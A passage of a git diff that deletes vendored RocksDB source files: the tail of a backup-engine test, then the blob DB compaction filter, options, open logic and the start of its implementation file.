-TEST_F(BackupableDBTest, LimitBackupsOpened) {
-  // Verify the specified max backups are opened, including skipping over
-  // corrupted backups.
-  //
-  // Setup:
-  // - backups 1, 2, and 4 are valid
-  // - backup 3 is corrupt
-  // - max_valid_backups_to_open == 2
-  //
-  // Expectation: the engine opens backups 4 and 2 since those are latest two
-  // non-corrupt backups.
-  const int kNumKeys = 5000;
-  OpenDBAndBackupEngine(true);
-  for (int i = 1; i <= 4; ++i) {
-    FillDB(db_.get(), kNumKeys * i, kNumKeys * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-    if (i == 3) {
-      ASSERT_OK(file_manager_->CorruptFile(backupdir_ + "/meta/3", 3));
-    }
-  }
-  CloseDBAndBackupEngine();
-
-  backupable_options_->max_valid_backups_to_open = 2;
-  OpenDBAndBackupEngine();
-  std::vector<BackupInfo> backup_infos;
-  backup_engine_->GetBackupInfo(&backup_infos);
-  ASSERT_EQ(2, backup_infos.size());
-  ASSERT_EQ(2, backup_infos[0].backup_id);
-  ASSERT_EQ(4, backup_infos[1].backup_id);
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-}
-
-}  // anon namespace
-
-} //  namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as BackupableDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !defined(ROCKSDB_LITE) && !defined(OS_WIN)
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_compaction_filter.h b/thirdparty/rocksdb/utilities/blob_db/blob_compaction_filter.h
deleted file mode 100644
index 26cd188..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_compaction_filter.h
+++ /dev/null
@@ -1,78 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/env.h"
-#include "utilities/blob_db/blob_index.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-// CompactionFilter to delete expired blob index from base DB.
-class BlobIndexCompactionFilter : public CompactionFilter {
- public:
-  explicit BlobIndexCompactionFilter(uint64_t current_time)
-      : current_time_(current_time) {}
-
-  virtual const char* Name() const override {
-    return "BlobIndexCompactionFilter";
-  }
-
-  // Filter expired blob indexes regardless of snapshots.
-  virtual bool IgnoreSnapshots() const override { return true; }
-
-  virtual Decision FilterV2(int /*level*/, const Slice& /*key*/,
-                            ValueType value_type, const Slice& value,
-                            std::string* /*new_value*/,
-                            std::string* /*skip_until*/) const override {
-    if (value_type != kBlobIndex) {
-      return Decision::kKeep;
-    }
-    BlobIndex blob_index;
-    Status s = blob_index.DecodeFrom(value);
-    if (!s.ok()) {
-      // Unable to decode blob index. Keeping the value.
-      return Decision::kKeep;
-    }
-    if (blob_index.HasTTL() && blob_index.expiration() <= current_time_) {
-      // Expired
-      return Decision::kRemove;
-    }
-    return Decision::kKeep;
-  }
-
- private:
-  const uint64_t current_time_;
-};
-
-class BlobIndexCompactionFilterFactory : public CompactionFilterFactory {
- public:
-  explicit BlobIndexCompactionFilterFactory(Env* env) : env_(env) {}
-
-  virtual const char* Name() const override {
-    return "BlobIndexCompactionFilterFactory";
-  }
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& /*context*/) override {
-    int64_t current_time = 0;
-    Status s = env_->GetCurrentTime(&current_time);
-    if (!s.ok()) {
-      return nullptr;
-    }
-    assert(current_time >= 0);
-    return std::unique_ptr<CompactionFilter>(
-        new BlobIndexCompactionFilter(static_cast<uint64_t>(current_time)));
-  }
-
- private:
-  Env* env_;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db.cc b/thirdparty/rocksdb/utilities/blob_db/blob_db.cc
deleted file mode 100644
index b278df7..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db.cc
+++ /dev/null
@@ -1,235 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/blob_db/blob_db.h"
-
-#include <inttypes.h>
-
-#include "db/write_batch_internal.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/cf_options.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "table/block.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_builder.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "utilities/blob_db/blob_compaction_filter.h"
-#include "utilities/blob_db/blob_db_impl.h"
-
-namespace rocksdb {
-
-namespace blob_db {
-port::Mutex listener_mutex;
-typedef std::shared_ptr<BlobDBFlushBeginListener> FlushBeginListener_t;
-typedef std::shared_ptr<BlobReconcileWalFilter> ReconcileWalFilter_t;
-typedef std::shared_ptr<EvictAllVersionsCompactionListener>
-    CompactionListener_t;
-
-// to ensure the lifetime of the listeners
-std::vector<std::shared_ptr<EventListener>> all_blobdb_listeners;
-std::vector<ReconcileWalFilter_t> all_wal_filters;
-
-Status BlobDB::OpenAndLoad(const Options& options,
-                           const BlobDBOptions& bdb_options,
-                           const std::string& dbname, BlobDB** blob_db,
-                           Options* changed_options) {
-  if (options.compaction_filter != nullptr ||
-      options.compaction_filter_factory != nullptr) {
-    return Status::NotSupported("Blob DB doesn't support compaction filter.");
-  }
-
-  *changed_options = options;
-  *blob_db = nullptr;
-
-  FlushBeginListener_t fblistener =
-      std::make_shared<BlobDBFlushBeginListener>();
-  ReconcileWalFilter_t rw_filter = std::make_shared<BlobReconcileWalFilter>();
-  CompactionListener_t ce_listener =
-      std::make_shared<EvictAllVersionsCompactionListener>();
-
-  {
-    MutexLock l(&listener_mutex);
-    all_blobdb_listeners.push_back(fblistener);
-    if (bdb_options.enable_garbage_collection) {
-      all_blobdb_listeners.push_back(ce_listener);
-    }
-    all_wal_filters.push_back(rw_filter);
-  }
-
-  changed_options->compaction_filter_factory.reset(
-      new BlobIndexCompactionFilterFactory(options.env));
-  changed_options->listeners.emplace_back(fblistener);
-  if (bdb_options.enable_garbage_collection) {
-    changed_options->listeners.emplace_back(ce_listener);
-  }
-  changed_options->wal_filter = rw_filter.get();
-
-  DBOptions db_options(*changed_options);
-
-  // we need to open blob db first so that recovery can happen
-  BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options);
-
-  fblistener->SetImplPtr(bdb);
-  if (bdb_options.enable_garbage_collection) {
-    ce_listener->SetImplPtr(bdb);
-  }
-  rw_filter->SetImplPtr(bdb);
-
-  Status s = bdb->OpenPhase1();
-  if (!s.ok()) return s;
-
-  *blob_db = bdb;
-  return s;
-}
-
-Status BlobDB::Open(const Options& options, const BlobDBOptions& bdb_options,
-                    const std::string& dbname, BlobDB** blob_db) {
-  *blob_db = nullptr;
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-  Status s = BlobDB::Open(db_options, bdb_options, dbname, column_families,
-                          &handles, blob_db);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a reference to
-    // default column family
-    delete handles[0];
-  }
-  return s;
-}
-
-Status BlobDB::Open(const DBOptions& db_options_input,
-                    const BlobDBOptions& bdb_options, const std::string& dbname,
-                    const std::vector<ColumnFamilyDescriptor>& column_families,
-                    std::vector<ColumnFamilyHandle*>* handles, BlobDB** blob_db,
-                    bool no_base_db) {
-  if (column_families.size() != 1 ||
-      column_families[0].name != kDefaultColumnFamilyName) {
-    return Status::NotSupported(
-        "Blob DB doesn't support non-default column family.");
-  }
-  *blob_db = nullptr;
-  Status s;
-
-  DBOptions db_options(db_options_input);
-  if (db_options.info_log == nullptr) {
-    s = CreateLoggerFromOptions(dbname, db_options, &db_options.info_log);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  FlushBeginListener_t fblistener =
-      std::make_shared<BlobDBFlushBeginListener>();
-  CompactionListener_t ce_listener =
-      std::make_shared<EvictAllVersionsCompactionListener>();
-  ReconcileWalFilter_t rw_filter = std::make_shared<BlobReconcileWalFilter>();
-
-  db_options.listeners.emplace_back(fblistener);
-  if (bdb_options.enable_garbage_collection) {
-    db_options.listeners.emplace_back(ce_listener);
-  }
-  db_options.wal_filter = rw_filter.get();
-
-  {
-    MutexLock l(&listener_mutex);
-    all_blobdb_listeners.push_back(fblistener);
-    if (bdb_options.enable_garbage_collection) {
-      all_blobdb_listeners.push_back(ce_listener);
-    }
-    all_wal_filters.push_back(rw_filter);
-  }
-
-  ColumnFamilyOptions cf_options(column_families[0].options);
-  if (cf_options.compaction_filter != nullptr ||
-      cf_options.compaction_filter_factory != nullptr) {
-    return Status::NotSupported("Blob DB doesn't support compaction filter.");
-  }
-  cf_options.compaction_filter_factory.reset(
-      new BlobIndexCompactionFilterFactory(db_options.env));
-  ColumnFamilyDescriptor cf_descriptor(kDefaultColumnFamilyName, cf_options);
-
-  // we need to open blob db first so that recovery can happen
-  BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options);
-  fblistener->SetImplPtr(bdb);
-  if (bdb_options.enable_garbage_collection) {
-    ce_listener->SetImplPtr(bdb);
-  }
-  rw_filter->SetImplPtr(bdb);
-
-  s = bdb->OpenPhase1();
-  if (!s.ok()) {
-    delete bdb;
-    return s;
-  }
-
-  if (no_base_db) {
-    *blob_db = bdb;
-    return s;
-  }
-
-  DB* db = nullptr;
-  s = DB::Open(db_options, dbname, {cf_descriptor}, handles, &db);
-  if (!s.ok()) {
-    delete bdb;
-    return s;
-  }
-
-  // set the implementation pointer
-  s = bdb->LinkToBaseDB(db);
-  if (!s.ok()) {
-    delete bdb;
-    bdb = nullptr;
-  }
-  *blob_db = bdb;
-  bdb_options.Dump(db_options.info_log.get());
-  return s;
-}
-
-BlobDB::BlobDB(DB* db) : StackableDB(db) {}
-
-void BlobDBOptions::Dump(Logger* log) const {
-  ROCKS_LOG_HEADER(log, "                 blob_db_options.blob_dir: %s",
-                   blob_dir.c_str());
-  ROCKS_LOG_HEADER(log, "            blob_db_options.path_relative: %d",
-                   path_relative);
-  ROCKS_LOG_HEADER(log, "                  blob_db_options.is_fifo: %d",
-                   is_fifo);
-  ROCKS_LOG_HEADER(log, "            blob_db_options.blob_dir_size: %" PRIu64,
-                   blob_dir_size);
-  ROCKS_LOG_HEADER(log, "           blob_db_options.ttl_range_secs: %" PRIu32,
-                   ttl_range_secs);
-  ROCKS_LOG_HEADER(log, "           blob_db_options.bytes_per_sync: %" PRIu64,
-                   bytes_per_sync);
-  ROCKS_LOG_HEADER(log, "           blob_db_options.blob_file_size: %" PRIu64,
-                   blob_file_size);
-  ROCKS_LOG_HEADER(log, "            blob_db_options.ttl_extractor: %p",
-                   ttl_extractor.get());
-  ROCKS_LOG_HEADER(log, "              blob_db_options.compression: %d",
-                   static_cast<int>(compression));
-  ROCKS_LOG_HEADER(log, "blob_db_options.enable_garbage_collection: %d",
-                   enable_garbage_collection);
-  ROCKS_LOG_HEADER(log, " blob_db_options.disable_background_tasks: %d",
-                   disable_background_tasks);
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db.h b/thirdparty/rocksdb/utilities/blob_db/blob_db.h
deleted file mode 100644
index 3ade460..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db.h
+++ /dev/null
@@ -1,263 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include <string>
-#include <vector>
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/stackable_db.h"
-
-namespace rocksdb {
-
-namespace blob_db {
-
-class TTLExtractor;
-
-// A wrapped database which puts values of KV pairs in a separate log
-// and store location to the log in the underlying DB.
-// It lacks lots of importatant functionalities, e.g. DB restarts,
-// garbage collection, iterators, etc.
-//
-// The factory needs to be moved to include/rocksdb/utilities to allow
-// users to use blob DB.
-
-struct BlobDBOptions {
-  // name of the directory under main db, where blobs will be stored.
-  // default is "blob_dir"
-  std::string blob_dir = "blob_dir";
-
-  // whether the blob_dir path is relative or absolute.
-  bool path_relative = true;
-
-  // is the eviction strategy fifo based
-  bool is_fifo = false;
-
-  // maximum size of the blob dir. Once this gets used, up
-  // evict the blob file which is oldest (is_fifo )
-  // 0 means no limits
-  uint64_t blob_dir_size = 0;
-
-  // a new bucket is opened, for ttl_range. So if ttl_range is 600seconds
-  // (10 minutes), and the first bucket starts at 1471542000
-  // then the blob buckets will be
-  // first bucket is 1471542000 - 1471542600
-  // second bucket is 1471542600 - 1471543200
-  // and so on
-  uint64_t ttl_range_secs = 3600;
-
-  // The smallest value to store in blob log. Value larger than this threshold
-  // will be inlined in base DB together with the key.
-  uint64_t min_blob_size = 0;
-
-  // at what bytes will the blob files be synced to blob log.
-  uint64_t bytes_per_sync = 0;
-
-  // the target size of each blob file. File will become immutable
-  // after it exceeds that size
-  uint64_t blob_file_size = 256 * 1024 * 1024;
-
-  // Instead of setting TTL explicitly by calling PutWithTTL or PutUntil,
-  // applications can set a TTLExtractor which can extract TTL from key-value
-  // pairs.
-  std::shared_ptr<TTLExtractor> ttl_extractor = nullptr;
-
-  // what compression to use for Blob's
-  CompressionType compression = kNoCompression;
-
-  // If enabled, blob DB periodically cleanup stale data by rewriting remaining
-  // live data in blob files to new files. If garbage collection is not enabled,
-  // blob files will be cleanup based on TTL.
-  bool enable_garbage_collection = false;
-
-  // Disable all background job. Used for test only.
-  bool disable_background_tasks = false;
-
-  void Dump(Logger* log) const;
-};
-
-class BlobDB : public StackableDB {
- public:
-  using rocksdb::StackableDB::Put;
-  virtual Status Put(const WriteOptions& options, const Slice& key,
-                     const Slice& value) override = 0;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) override {
-    if (column_family != DefaultColumnFamily()) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    return Put(options, key, value);
-  }
-
-  using rocksdb::StackableDB::Delete;
-  virtual Status Delete(const WriteOptions& options,
-                        const Slice& key) override = 0;
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override {
-    if (column_family != DefaultColumnFamily()) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    return Delete(options, key);
-  }
-
-  virtual Status PutWithTTL(const WriteOptions& options, const Slice& key,
-                            const Slice& value, uint64_t ttl) = 0;
-  virtual Status PutWithTTL(const WriteOptions& options,
-                            ColumnFamilyHandle* column_family, const Slice& key,
-                            const Slice& value, uint64_t ttl) {
-    if (column_family != DefaultColumnFamily()) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    return PutWithTTL(options, key, value, ttl);
-  }
-
-  // Put with expiration. Key with expiration time equal to
-  // std::numeric_limits<uint64_t>::max() means the key don't expire.
-  virtual Status PutUntil(const WriteOptions& options, const Slice& key,
-                          const Slice& value, uint64_t expiration) = 0;
-  virtual Status PutUntil(const WriteOptions& options,
-                          ColumnFamilyHandle* column_family, const Slice& key,
-                          const Slice& value, uint64_t expiration) {
-    if (column_family != DefaultColumnFamily()) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    return PutUntil(options, key, value, expiration);
-  }
-
-  using rocksdb::StackableDB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override = 0;
-
-  using rocksdb::StackableDB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override = 0;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override {
-    for (auto column_family : column_families) {
-      if (column_family != DefaultColumnFamily()) {
-        return std::vector<Status>(
-            column_families.size(),
-            Status::NotSupported(
-                "Blob DB doesn't support non-default column family."));
-      }
-    }
-    return MultiGet(options, keys, values);
-  }
-
-  using rocksdb::StackableDB::SingleDelete;
-  virtual Status SingleDelete(const WriteOptions& /*wopts*/,
-                              ColumnFamilyHandle* /*column_family*/,
-                              const Slice& /*key*/) override {
-    return Status::NotSupported("Not supported operation in blob db.");
-  }
-
-  using rocksdb::StackableDB::Merge;
-  virtual Status Merge(const WriteOptions& /*options*/,
-                       ColumnFamilyHandle* /*column_family*/,
-                       const Slice& /*key*/, const Slice& /*value*/) override {
-    return Status::NotSupported("Not supported operation in blob db.");
-  }
-
-  virtual Status Write(const WriteOptions& opts,
-                       WriteBatch* updates) override = 0;
-
-  using rocksdb::StackableDB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& options) override = 0;
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) override {
-    if (column_family != DefaultColumnFamily()) {
-      // Blob DB doesn't support non-default column family.
-      return nullptr;
-    }
-    return NewIterator(options);
-  }
-
-  // Starting point for opening a Blob DB.
-  // changed_options - critical. Blob DB loads and inserts listeners
-  // into options which are necessary for recovery and atomicity
-  // Use this pattern if you need control on step 2, i.e. your
-  // BaseDB is not just a simple rocksdb but a stacked DB
-  // 1. ::OpenAndLoad
-  // 2. Open Base DB with the changed_options
-  // 3. ::LinkToBaseDB
-  static Status OpenAndLoad(const Options& options,
-                            const BlobDBOptions& bdb_options,
-                            const std::string& dbname, BlobDB** blob_db,
-                            Options* changed_options);
-
-  // This is another way to open BLOB DB which do not have other
-  // Stackable DB's in play
-  // Steps.
-  // 1. ::Open
-  static Status Open(const Options& options, const BlobDBOptions& bdb_options,
-                     const std::string& dbname, BlobDB** blob_db);
-
-  static Status Open(const DBOptions& db_options,
-                     const BlobDBOptions& bdb_options,
-                     const std::string& dbname,
-                     const std::vector<ColumnFamilyDescriptor>& column_families,
-                     std::vector<ColumnFamilyHandle*>* handles,
-                     BlobDB** blob_db, bool no_base_db = false);
-
-  virtual BlobDBOptions GetBlobDBOptions() const = 0;
-
-  virtual ~BlobDB() {}
-
-  virtual Status LinkToBaseDB(DB* db_base) = 0;
-
- protected:
-  explicit BlobDB(DB* db);
-};
-
-// Destroy the content of the database.
-Status DestroyBlobDB(const std::string& dbname, const Options& options,
-                     const BlobDBOptions& bdb_options);
-
-// TTLExtractor allow applications to extract TTL from key-value pairs.
-// This useful for applications using Put or WriteBatch to write keys and
-// don't intend to migrate to PutWithTTL or PutUntil.
-//
-// Applications can implement either ExtractTTL or ExtractExpiration. If both
-// are implemented, ExtractExpiration will take precedence.
-class TTLExtractor {
- public:
-  // Extract TTL from key-value pair.
-  // Return true if the key has TTL, false otherwise. If key has TTL,
-  // TTL is pass back through ttl. The method can optionally modify the value,
-  // pass the result back through new_value, and also set value_changed to true.
-  virtual bool ExtractTTL(const Slice& key, const Slice& value, uint64_t* ttl,
-                          std::string* new_value, bool* value_changed);
-
-  // Extract expiration time from key-value pair.
-  // Return true if the key has expiration time, false otherwise. If key has
-  // expiration time, it is pass back through expiration. The method can
-  // optionally modify the value, pass the result back through new_value,
-  // and also set value_changed to true.
-  virtual bool ExtractExpiration(const Slice& key, const Slice& value,
-                                 uint64_t now, uint64_t* expiration,
-                                 std::string* new_value, bool* value_changed);
-
-  virtual ~TTLExtractor() = default;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.cc b/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.cc
deleted file mode 100644
index 23f173f..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.cc
+++ /dev/null
@@ -1,2223 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/blob_db/blob_db_impl.h"
-#include <algorithm>
-#include <cinttypes>
-#include <iomanip>
-#include <limits>
-#include <memory>
-
-#include "db/db_impl.h"
-#include "db/write_batch_internal.h"
-#include "monitoring/instrumented_mutex.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/utilities/transaction.h"
-#include "table/block.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_builder.h"
-#include "table/meta_blocks.h"
-#include "util/cast_util.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-#include "util/timer_queue.h"
-#include "utilities/blob_db/blob_db_iterator.h"
-#include "utilities/blob_db/blob_index.h"
-
-namespace {
-int kBlockBasedTableVersionFormat = 2;
-}  // end namespace
-
-namespace rocksdb {
-namespace blob_db {
-
-Random blob_rgen(static_cast<uint32_t>(time(nullptr)));
-
-void BlobDBFlushBeginListener::OnFlushBegin(DB* db, const FlushJobInfo& info) {
-  if (impl_) impl_->OnFlushBeginHandler(db, info);
-}
-
-WalFilter::WalProcessingOption BlobReconcileWalFilter::LogRecordFound(
-    unsigned long long log_number, const std::string& log_file_name,
-    const WriteBatch& batch, WriteBatch* new_batch, bool* batch_changed) {
-  return WalFilter::WalProcessingOption::kContinueProcessing;
-}
-
-bool blobf_compare_ttl::operator()(const std::shared_ptr<BlobFile>& lhs,
-                                   const std::shared_ptr<BlobFile>& rhs) const {
-  if (lhs->expiration_range_.first < rhs->expiration_range_.first) {
-    return true;
-  }
-  if (lhs->expiration_range_.first > rhs->expiration_range_.first) {
-    return false;
-  }
-  return lhs->BlobFileNumber() < rhs->BlobFileNumber();
-}
-
-void EvictAllVersionsCompactionListener::InternalListener::OnCompaction(
-    int level, const Slice& key,
-    CompactionEventListener::CompactionListenerValueType value_type,
-    const Slice& existing_value, const SequenceNumber& sn, bool is_new) {
-  assert(impl_->bdb_options_.enable_garbage_collection);
-  if (!is_new &&
-      value_type ==
-          CompactionEventListener::CompactionListenerValueType::kValue) {
-    BlobIndex blob_index;
-    Status s = blob_index.DecodeFrom(existing_value);
-    if (s.ok()) {
-      if (impl_->debug_level_ >= 3)
-        ROCKS_LOG_INFO(
-            impl_->db_options_.info_log,
-            "CALLBACK COMPACTED OUT KEY: %s SN: %d "
-            "NEW: %d FN: %" PRIu64 " OFFSET: %" PRIu64 " SIZE: %" PRIu64,
-            key.ToString().c_str(), sn, is_new, blob_index.file_number(),
-            blob_index.offset(), blob_index.size());
-
-      impl_->override_vals_q_.enqueue({blob_index.file_number(), key.size(),
-                                       blob_index.offset(), blob_index.size(),
-                                       sn});
-    }
-  } else {
-    if (impl_->debug_level_ >= 3)
-      ROCKS_LOG_INFO(impl_->db_options_.info_log,
-                     "CALLBACK NEW KEY: %s SN: %d NEW: %d",
-                     key.ToString().c_str(), sn, is_new);
-  }
-}
-
-BlobDBImpl::BlobDBImpl(const std::string& dbname,
-                       const BlobDBOptions& blob_db_options,
-                       const DBOptions& db_options)
-    : BlobDB(nullptr),
-      db_impl_(nullptr),
-      env_(db_options.env),
-      ttl_extractor_(blob_db_options.ttl_extractor.get()),
-      bdb_options_(blob_db_options),
-      db_options_(db_options),
-      env_options_(db_options),
-      dir_change_(false),
-      next_file_number_(1),
-      epoch_of_(0),
-      shutdown_(false),
-      current_epoch_(0),
-      open_file_count_(0),
-      last_period_write_(0),
-      last_period_ampl_(0),
-      total_periods_write_(0),
-      total_periods_ampl_(0),
-      total_blob_space_(0),
-      open_p1_done_(false),
-      debug_level_(0),
-      oldest_file_evicted_(false) {
-  blob_dir_ = (bdb_options_.path_relative)
-                  ? dbname + "/" + bdb_options_.blob_dir
-                  : bdb_options_.blob_dir;
-}
-
-Status BlobDBImpl::LinkToBaseDB(DB* db) {
-  assert(db_ == nullptr);
-  assert(open_p1_done_);
-
-  db_ = db;
-
-  // the Base DB in-itself can be a stackable DB
-  db_impl_ = static_cast_with_check<DBImpl, DB>(db_->GetRootDB());
-
-  env_ = db_->GetEnv();
-
-  Status s = env_->CreateDirIfMissing(blob_dir_);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(db_options_.info_log,
-                   "Failed to create blob directory: %s status: '%s'",
-                   blob_dir_.c_str(), s.ToString().c_str());
-  }
-  s = env_->NewDirectory(blob_dir_, &dir_ent_);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(db_options_.info_log,
-                   "Failed to open blob directory: %s status: '%s'",
-                   blob_dir_.c_str(), s.ToString().c_str());
-  }
-
-  if (!bdb_options_.disable_background_tasks) {
-    StartBackgroundTasks();
-  }
-  return s;
-}
-
-BlobDBOptions BlobDBImpl::GetBlobDBOptions() const { return bdb_options_; }
-
-BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options)
-    : BlobDB(db),
-      db_impl_(static_cast_with_check<DBImpl, DB>(db)),
-      bdb_options_(blob_db_options),
-      db_options_(db->GetOptions()),
-      env_options_(db_->GetOptions()),
-      dir_change_(false),
-      next_file_number_(1),
-      epoch_of_(0),
-      shutdown_(false),
-      current_epoch_(0),
-      open_file_count_(0),
-      last_period_write_(0),
-      last_period_ampl_(0),
-      total_periods_write_(0),
-      total_periods_ampl_(0),
-      total_blob_space_(0),
-      oldest_file_evicted_(false) {
-  if (!bdb_options_.blob_dir.empty())
-    blob_dir_ = (bdb_options_.path_relative)
-                    ? db_->GetName() + "/" + bdb_options_.blob_dir
-                    : bdb_options_.blob_dir;
-}
-
-BlobDBImpl::~BlobDBImpl() {
-  // CancelAllBackgroundWork(db_, true);
-
-  Shutdown();
-}
-
-Status BlobDBImpl::OpenPhase1() {
-  assert(db_ == nullptr);
-  if (blob_dir_.empty())
-    return Status::NotSupported("No blob directory in options");
-
-  std::unique_ptr<Directory> dir_ent;
-  Status s = env_->NewDirectory(blob_dir_, &dir_ent);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(db_options_.info_log,
-                   "Failed to open blob directory: %s status: '%s'",
-                   blob_dir_.c_str(), s.ToString().c_str());
-    open_p1_done_ = true;
-    return Status::OK();
-  }
-
-  s = OpenAllFiles();
-  open_p1_done_ = true;
-  return s;
-}
-
-void BlobDBImpl::StartBackgroundTasks() {
-  // store a call to a member function and object
-  tqueue_.add(
-      kReclaimOpenFilesPeriodMillisecs,
-      std::bind(&BlobDBImpl::ReclaimOpenFiles, this, std::placeholders::_1));
-  tqueue_.add(kGCCheckPeriodMillisecs,
-              std::bind(&BlobDBImpl::RunGC, this, std::placeholders::_1));
-  if (bdb_options_.enable_garbage_collection) {
-    tqueue_.add(
-        kDeleteCheckPeriodMillisecs,
-        std::bind(&BlobDBImpl::EvictDeletions, this, std::placeholders::_1));
-    tqueue_.add(
-        kDeleteCheckPeriodMillisecs,
-        std::bind(&BlobDBImpl::EvictCompacted, this, std::placeholders::_1));
-  }
-  tqueue_.add(
-      kDeleteObsoleteFilesPeriodMillisecs,
-      std::bind(&BlobDBImpl::DeleteObsoleteFiles, this, std::placeholders::_1));
-  tqueue_.add(kSanityCheckPeriodMillisecs,
-              std::bind(&BlobDBImpl::SanityCheck, this, std::placeholders::_1));
-  tqueue_.add(kWriteAmplificationStatsPeriodMillisecs,
-              std::bind(&BlobDBImpl::WaStats, this, std::placeholders::_1));
-  tqueue_.add(kFSyncFilesPeriodMillisecs,
-              std::bind(&BlobDBImpl::FsyncFiles, this, std::placeholders::_1));
-  tqueue_.add(
-      kCheckSeqFilesPeriodMillisecs,
-      std::bind(&BlobDBImpl::CheckSeqFiles, this, std::placeholders::_1));
-}
-
-void BlobDBImpl::Shutdown() { shutdown_.store(true); }
-
-void BlobDBImpl::OnFlushBeginHandler(DB* db, const FlushJobInfo& info) {
-  if (shutdown_.load()) return;
-
-  // a callback that happens too soon needs to be ignored
-  if (!db_) return;
-
-  FsyncFiles(false);
-}
-
-Status BlobDBImpl::GetAllLogFiles(
-    std::set<std::pair<uint64_t, std::string>>* file_nums) {
-  std::vector<std::string> all_files;
-  Status status = env_->GetChildren(blob_dir_, &all_files);
-  if (!status.ok()) {
-    return status;
-  }
-
-  for (const auto& f : all_files) {
-    uint64_t number;
-    FileType type;
-    bool psucc = ParseFileName(f, &number, &type);
-    if (psucc && type == kBlobFile) {
-      file_nums->insert(std::make_pair(number, f));
-    } else {
-      ROCKS_LOG_WARN(db_options_.info_log,
